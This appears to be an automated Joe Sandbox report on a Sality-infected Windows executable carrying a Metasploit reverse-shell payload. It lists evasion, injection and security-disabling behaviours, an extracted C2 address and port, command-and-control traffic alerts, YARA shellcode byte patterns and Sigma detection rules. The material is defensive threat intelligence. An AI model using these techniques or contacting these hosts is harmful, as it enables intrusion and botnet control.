Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PfBjDhHzvV.exe

Overview

General Information

Sample name:PfBjDhHzvV.exe
renamed because original name is a hash value
Original sample name:31bbb64aa3c1753cd99c865869b58023.exe
Analysis ID:1536844
MD5:31bbb64aa3c1753cd99c865869b58023
SHA1:339ecde6fcc4833268f84d0dd5bcb11606ea5e94
SHA256:1a089c8808acf7d3a83c0524e07bd0bb888ab3c987d109bae0613e456c08f32f
Tags:32coinminerexetrojan
Infos:

Detection

Metasploit, Sality
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Metasploit Payload
Yara detected Sality
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject threads in other processes
Creates HTML files with .exe extension (expired dropper behavior)
Creates a thread in another existing process (thread injection)
Creates autorun.inf (USB autostart)
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disables UAC (registry)
Disables user account control notifications
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Modifies the windows firewall
Modifies the windows firewall notifications settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PfBjDhHzvV.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\PfBjDhHzvV.exe" MD5: 31BBB64AA3C1753CD99C865869B58023)
    • fontdrvhost.exe (PID: 772 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dllhost.exe (PID: 7384 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
    • fontdrvhost.exe (PID: 780 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dwm.exe (PID: 976 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sihost.exe (PID: 3476 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
    • svchost.exe (PID: 3524 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • svchost.exe (PID: 3556 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • ctfmon.exe (PID: 3852 cmdline: "ctfmon.exe" MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
    • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
    • svchost.exe (PID: 1096 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • StartMenuExperienceHost.exe (PID: 4756 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
    • RuntimeBroker.exe (PID: 4844 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • SearchApp.exe (PID: 4972 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
    • ShellExperienceHost.exe (PID: 7984 cmdline: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca MD5: 9B8DE9D4EDF68EEF2C1E490ABC291567)
    • RuntimeBroker.exe (PID: 3596 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • RuntimeBroker.exe (PID: 5620 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • smartscreen.exe (PID: 5672 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
    • ApplicationFrameHost.exe (PID: 3496 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
    • WinStore.App.exe (PID: 1868 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
    • RuntimeBroker.exe (PID: 3536 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • TextInputHost.exe (PID: 6852 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
    • conhost.exe (PID: 700 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • backgroundTaskHost.exe (PID: 6176 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca MD5: DA7063B17DBB8BBB3015351016868006)
    • RuntimeBroker.exe (PID: 4908 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • svchost.exe (PID: 4852 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • faawXJQQDELvfTymNiVz.exe (PID: 3888 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 4432 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 6644 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 4548 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 6748 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 3364 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 6152 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 4256 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 5744 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 4692 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 3032 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 3300 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SalityF-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware.Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.InfectionSality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult.Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file's code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware's code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.PayloadOnce installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.
  • Salty Spider
https://malpedia.caad.fkie.fraunhofer.de/details/win.sality

Malware Configuration

Threatname: Metasploit

{"Type": "Metasploit Connect", "IP": "189.25.42.209", "Port": 1338}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_4a1c4da8Identifies Metasploit 64 bit reverse tcp shellcode.unknown
    • 0x6c97:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08
    00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
      00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_4a1c4da8Identifies Metasploit 64 bit reverse tcp shellcode.unknown
      • 0x1a0:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08
      00000000.00000002.2233936236.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
        Click to see the 2 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.PfBjDhHzvV.exe.1280cc4.6.raw.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
        • 0x185c:$s1: Simple Poly Engine v
        35.2.faawXJQQDELvfTymNiVz.exe.28a0cc4.5.raw.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
        • 0x185c:$s1: Simple Poly Engine v
        35.2.faawXJQQDELvfTymNiVz.exe.2880000.4.unpackJoeSecurity_SalityYara detected SalityJoe Security
          35.2.faawXJQQDELvfTymNiVz.exe.2880000.4.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
          • 0x22520:$s1: Simple Poly Engine v
          0.2.PfBjDhHzvV.exe.1260000.5.unpackJoeSecurity_SalityYara detected SalityJoe Security
            Click to see the 3 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Communication To Uncommon Destination Ports
            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 190.120.227.91, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\PfBjDhHzvV.exe, Initiated: true, ProcessId: 7272, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49737
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PfBjDhHzvV.exe", ParentImage: C:\Users\user\Desktop\PfBjDhHzvV.exe, ParentProcessId: 7272, ParentProcessName: PfBjDhHzvV.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3524, ProcessName: svchost.exe
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PfBjDhHzvV.exe, ProcessId: 7272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PfBjDhHzvV.exe", ParentImage: C:\Users\user\Desktop\PfBjDhHzvV.exe, ParentProcessId: 7272, ParentProcessName: PfBjDhHzvV.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3524, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-18T09:38:21.240690+020020127361Malware Command and Control Activity Detected192.168.2.749737190.120.227.918080TCP
            2024-10-18T09:38:26.713691+020020127361Malware Command and Control Activity Detected192.168.2.749764190.120.227.918080TCP
            2024-10-18T09:38:32.076146+020020127361Malware Command and Control Activity Detected192.168.2.749790190.120.227.918080TCP
            2024-10-18T09:38:37.482585+020020127361Malware Command and Control Activity Detected192.168.2.749824190.120.227.918080TCP
            2024-10-18T09:38:42.849777+020020127361Malware Command and Control Activity Detected192.168.2.749851190.120.227.918080TCP
            2024-10-18T09:38:48.414602+020020127361Malware Command and Control Activity Detected192.168.2.749888190.120.227.918080TCP
            2024-10-18T09:38:53.779104+020020127361Malware Command and Control Activity Detected192.168.2.749922190.120.227.918080TCP
            2024-10-18T09:38:59.200915+020020127361Malware Command and Control Activity Detected192.168.2.762459190.120.227.918080TCP
            2024-10-18T09:39:04.530611+020020127361Malware Command and Control Activity Detected192.168.2.762493190.120.227.918080TCP
            2024-10-18T09:39:10.778945+020020127361Malware Command and Control Activity Detected192.168.2.762512190.120.227.918080TCP
            2024-10-18T09:39:16.194613+020020127361Malware Command and Control Activity Detected192.168.2.762514190.120.227.918080TCP
            2024-10-18T09:39:21.577260+020020127361Malware Command and Control Activity Detected192.168.2.762517190.120.227.918080TCP
            2024-10-18T09:39:26.962883+020020127361Malware Command and Control Activity Detected192.168.2.762519190.120.227.918080TCP
            2024-10-18T09:39:32.388529+020020127361Malware Command and Control Activity Detected192.168.2.762522190.120.227.918080TCP
            2024-10-18T09:39:37.753556+020020127361Malware Command and Control Activity Detected192.168.2.762525190.120.227.918080TCP
            2024-10-18T09:39:42.049055+020020127361Malware Command and Control Activity Detected192.168.2.762527190.120.227.918080TCP
            2024-10-18T09:39:53.953751+020020127361Malware Command and Control Activity Detected192.168.2.762529190.120.227.918080TCP
            2024-10-18T09:40:03.871177+020020127361Malware Command and Control Activity Detected192.168.2.762531190.120.227.918080TCP
            2024-10-18T09:40:13.679122+020020127361Malware Command and Control Activity Detected192.168.2.762533190.120.227.918080TCP
            2024-10-18T09:40:23.537013+020020127361Malware Command and Control Activity Detected192.168.2.762535190.120.227.918080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-18T09:38:17.050151+020020183401Malware Command and Control Activity Detected192.168.2.749731185.53.178.5080TCP
            2024-10-18T09:38:21.240690+020020183401Malware Command and Control Activity Detected192.168.2.749737190.120.227.918080TCP
            2024-10-18T09:38:22.591417+020020183401Malware Command and Control Activity Detected192.168.2.749758185.53.178.5080TCP
            2024-10-18T09:38:26.713691+020020183401Malware Command and Control Activity Detected192.168.2.749764190.120.227.918080TCP
            2024-10-18T09:38:28.058130+020020183401Malware Command and Control Activity Detected192.168.2.749783185.53.178.5080TCP
            2024-10-18T09:38:32.076146+020020183401Malware Command and Control Activity Detected192.168.2.749790190.120.227.918080TCP
            2024-10-18T09:38:33.454309+020020183401Malware Command and Control Activity Detected192.168.2.749813185.53.178.5080TCP
            2024-10-18T09:38:37.482585+020020183401Malware Command and Control Activity Detected192.168.2.749824190.120.227.918080TCP
            2024-10-18T09:38:38.799893+020020183401Malware Command and Control Activity Detected192.168.2.749845185.53.178.5080TCP
            2024-10-18T09:38:42.849777+020020183401Malware Command and Control Activity Detected192.168.2.749851190.120.227.918080TCP
            2024-10-18T09:38:44.218274+020020183401Malware Command and Control Activity Detected192.168.2.749881185.53.178.5080TCP
            2024-10-18T09:38:48.414602+020020183401Malware Command and Control Activity Detected192.168.2.749888190.120.227.918080TCP
            2024-10-18T09:38:49.758906+020020183401Malware Command and Control Activity Detected192.168.2.749913185.53.178.5080TCP
            2024-10-18T09:38:53.779104+020020183401Malware Command and Control Activity Detected192.168.2.749922190.120.227.918080TCP
            2024-10-18T09:38:55.191539+020020183401Malware Command and Control Activity Detected192.168.2.749943185.53.178.5080TCP
            2024-10-18T09:38:59.200915+020020183401Malware Command and Control Activity Detected192.168.2.762459190.120.227.918080TCP
            2024-10-18T09:39:00.500105+020020183401Malware Command and Control Activity Detected192.168.2.762487185.53.178.5080TCP
            2024-10-18T09:39:04.530611+020020183401Malware Command and Control Activity Detected192.168.2.762493190.120.227.918080TCP
            2024-10-18T09:39:06.749431+020020183401Malware Command and Control Activity Detected192.168.2.762510185.53.178.5080TCP
            2024-10-18T09:39:10.778945+020020183401Malware Command and Control Activity Detected192.168.2.762512190.120.227.918080TCP
            2024-10-18T09:39:12.134928+020020183401Malware Command and Control Activity Detected192.168.2.762513185.53.178.5080TCP
            2024-10-18T09:39:16.194613+020020183401Malware Command and Control Activity Detected192.168.2.762514190.120.227.918080TCP
            2024-10-18T09:39:17.525520+020020183401Malware Command and Control Activity Detected192.168.2.762516185.53.178.5080TCP
            2024-10-18T09:39:21.577260+020020183401Malware Command and Control Activity Detected192.168.2.762517190.120.227.918080TCP
            2024-10-18T09:39:22.899604+020020183401Malware Command and Control Activity Detected192.168.2.762518185.53.178.5080TCP
            2024-10-18T09:39:26.962883+020020183401Malware Command and Control Activity Detected192.168.2.762519190.120.227.918080TCP
            2024-10-18T09:39:28.305192+020020183401Malware Command and Control Activity Detected192.168.2.762521185.53.178.5080TCP
            2024-10-18T09:39:32.388529+020020183401Malware Command and Control Activity Detected192.168.2.762522190.120.227.918080TCP
            2024-10-18T09:39:33.728702+020020183401Malware Command and Control Activity Detected192.168.2.762524185.53.178.5080TCP
            2024-10-18T09:39:37.753556+020020183401Malware Command and Control Activity Detected192.168.2.762525190.120.227.918080TCP
            2024-10-18T09:39:39.248321+020020183401Malware Command and Control Activity Detected192.168.2.762526185.53.178.5080TCP
            2024-10-18T09:39:42.049055+020020183401Malware Command and Control Activity Detected192.168.2.762527190.120.227.918080TCP
            2024-10-18T09:39:45.318935+020020183401Malware Command and Control Activity Detected192.168.2.762528185.53.178.5080TCP
            2024-10-18T09:39:53.953751+020020183401Malware Command and Control Activity Detected192.168.2.762529190.120.227.918080TCP
            2024-10-18T09:39:55.330024+020020183401Malware Command and Control Activity Detected192.168.2.762530185.53.178.5080TCP
            2024-10-18T09:40:03.871177+020020183401Malware Command and Control Activity Detected192.168.2.762531190.120.227.918080TCP
            2024-10-18T09:40:05.184315+020020183401Malware Command and Control Activity Detected192.168.2.762532185.53.178.5080TCP
            2024-10-18T09:40:13.679122+020020183401Malware Command and Control Activity Detected192.168.2.762533190.120.227.918080TCP
            2024-10-18T09:40:15.014967+020020183401Malware Command and Control Activity Detected192.168.2.762534185.53.178.5080TCP
            2024-10-18T09:40:23.537013+020020183401Malware Command and Control Activity Detected192.168.2.762535190.120.227.918080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-18T09:38:17.050151+020028032702Potentially Bad Traffic192.168.2.749731185.53.178.5080TCP
            2024-10-18T09:38:21.240690+020028032702Potentially Bad Traffic192.168.2.749737190.120.227.918080TCP
            2024-10-18T09:38:22.591417+020028032702Potentially Bad Traffic192.168.2.749758185.53.178.5080TCP
            2024-10-18T09:38:26.713691+020028032702Potentially Bad Traffic192.168.2.749764190.120.227.918080TCP
            2024-10-18T09:38:28.058130+020028032702Potentially Bad Traffic192.168.2.749783185.53.178.5080TCP
            2024-10-18T09:38:32.076146+020028032702Potentially Bad Traffic192.168.2.749790190.120.227.918080TCP
            2024-10-18T09:38:33.454309+020028032702Potentially Bad Traffic192.168.2.749813185.53.178.5080TCP
            2024-10-18T09:38:37.482585+020028032702Potentially Bad Traffic192.168.2.749824190.120.227.918080TCP
            2024-10-18T09:38:38.799893+020028032702Potentially Bad Traffic192.168.2.749845185.53.178.5080TCP
            2024-10-18T09:38:42.849777+020028032702Potentially Bad Traffic192.168.2.749851190.120.227.918080TCP
            2024-10-18T09:38:44.218274+020028032702Potentially Bad Traffic192.168.2.749881185.53.178.5080TCP
            2024-10-18T09:38:48.414602+020028032702Potentially Bad Traffic192.168.2.749888190.120.227.918080TCP
            2024-10-18T09:38:49.758906+020028032702Potentially Bad Traffic192.168.2.749913185.53.178.5080TCP
            2024-10-18T09:38:53.779104+020028032702Potentially Bad Traffic192.168.2.749922190.120.227.918080TCP
            2024-10-18T09:38:55.191539+020028032702Potentially Bad Traffic192.168.2.749943185.53.178.5080TCP
            2024-10-18T09:38:59.200915+020028032702Potentially Bad Traffic192.168.2.762459190.120.227.918080TCP
            2024-10-18T09:39:00.500105+020028032702Potentially Bad Traffic192.168.2.762487185.53.178.5080TCP
            2024-10-18T09:39:04.530611+020028032702Potentially Bad Traffic192.168.2.762493190.120.227.918080TCP
            2024-10-18T09:39:06.749431+020028032702Potentially Bad Traffic192.168.2.762510185.53.178.5080TCP
            2024-10-18T09:39:10.778945+020028032702Potentially Bad Traffic192.168.2.762512190.120.227.918080TCP
            2024-10-18T09:39:12.134928+020028032702Potentially Bad Traffic192.168.2.762513185.53.178.5080TCP
            2024-10-18T09:39:16.194613+020028032702Potentially Bad Traffic192.168.2.762514190.120.227.918080TCP
            2024-10-18T09:39:17.525520+020028032702Potentially Bad Traffic192.168.2.762516185.53.178.5080TCP
            2024-10-18T09:39:21.577260+020028032702Potentially Bad Traffic192.168.2.762517190.120.227.918080TCP
            2024-10-18T09:39:22.899604+020028032702Potentially Bad Traffic192.168.2.762518185.53.178.5080TCP
            2024-10-18T09:39:26.962883+020028032702Potentially Bad Traffic192.168.2.762519190.120.227.918080TCP
            2024-10-18T09:39:28.305192+020028032702Potentially Bad Traffic192.168.2.762521185.53.178.5080TCP
            2024-10-18T09:39:32.388529+020028032702Potentially Bad Traffic192.168.2.762522190.120.227.918080TCP
            2024-10-18T09:39:33.728702+020028032702Potentially Bad Traffic192.168.2.762524185.53.178.5080TCP
            2024-10-18T09:39:37.753556+020028032702Potentially Bad Traffic192.168.2.762525190.120.227.918080TCP
            2024-10-18T09:39:39.248321+020028032702Potentially Bad Traffic192.168.2.762526185.53.178.5080TCP
            2024-10-18T09:39:42.049055+020028032702Potentially Bad Traffic192.168.2.762527190.120.227.918080TCP
            2024-10-18T09:39:45.318935+020028032702Potentially Bad Traffic192.168.2.762528185.53.178.5080TCP
            2024-10-18T09:39:53.953751+020028032702Potentially Bad Traffic192.168.2.762529190.120.227.918080TCP
            2024-10-18T09:39:55.330024+020028032702Potentially Bad Traffic192.168.2.762530185.53.178.5080TCP
            2024-10-18T09:40:03.871177+020028032702Potentially Bad Traffic192.168.2.762531190.120.227.918080TCP
            2024-10-18T09:40:05.184315+020028032702Potentially Bad Traffic192.168.2.762532185.53.178.5080TCP
            2024-10-18T09:40:13.679122+020028032702Potentially Bad Traffic192.168.2.762533190.120.227.918080TCP
            2024-10-18T09:40:15.014967+020028032702Potentially Bad Traffic192.168.2.762534185.53.178.5080TCP
            2024-10-18T09:40:23.537013+020028032702Potentially Bad Traffic192.168.2.762535190.120.227.918080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: PfBjDhHzvV.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\winbwxmuq.exeAvira: detection malicious, Label: W32/Sality.AT
            Source: C:\Users\user\AppData\Local\Temp\winysum.exeAvira: detection malicious, Label: W32/Sality.AT
            Source: C:\Users\user\AppData\Local\Temp\xjjalq.exeAvira: detection malicious, Label: W32/Sality.AT
            Source: C:\Users\user\AppData\Local\Temp\xlroe.exeAvira: detection malicious, Label: W32/Sality.AT
            Source: C:\taqcpb.exeAvira: detection malicious, Label: W32/Sality.AT
            Found malware configuration
            Source: 00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Type": "Metasploit Connect", "IP": "189.25.42.209", "Port": 1338}
            Multi AV Scanner detection for submitted file
            Source: PfBjDhHzvV.exeReversingLabs: Detection: 94%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\winbwxmuq.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\winysum.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\xjjalq.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\xlroe.exeJoe Sandbox ML: detected
            Source: C:\taqcpb.exeJoe Sandbox ML: detected
